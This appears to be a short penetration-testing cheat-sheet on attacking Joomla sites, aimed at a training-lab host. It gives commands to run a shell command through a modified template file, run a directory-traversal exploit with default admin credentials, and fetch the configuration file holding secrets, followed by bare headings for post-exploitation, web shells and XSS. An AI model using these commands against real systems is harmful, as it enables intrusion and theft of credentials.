abuse
1. Joomla Admin Panel Code Execution (Template Customization)
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id2. Joomla Core Directory Traversal (CVE-2019-10945)
python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /3. Joomla Configuration File Exploitation (Manual, if accessible)
curl -s http://dev.inlanefreight.local/configuration.php4. Joomla Extension Exploitation (Manual)
5. Metasploit Joomla Modules (if applicable)
6. Database Exploitation (if SQL injection is achieved)
7. Post-Exploitation (Privilege Escalation, Lateral Movement)
8. Joomla Rest API Attacks
9. Advanced Web Shell Techniques
10. Client-Side Attacks (XSS)
11. Joomla CLI (if accessible)
Important Things:
Last updated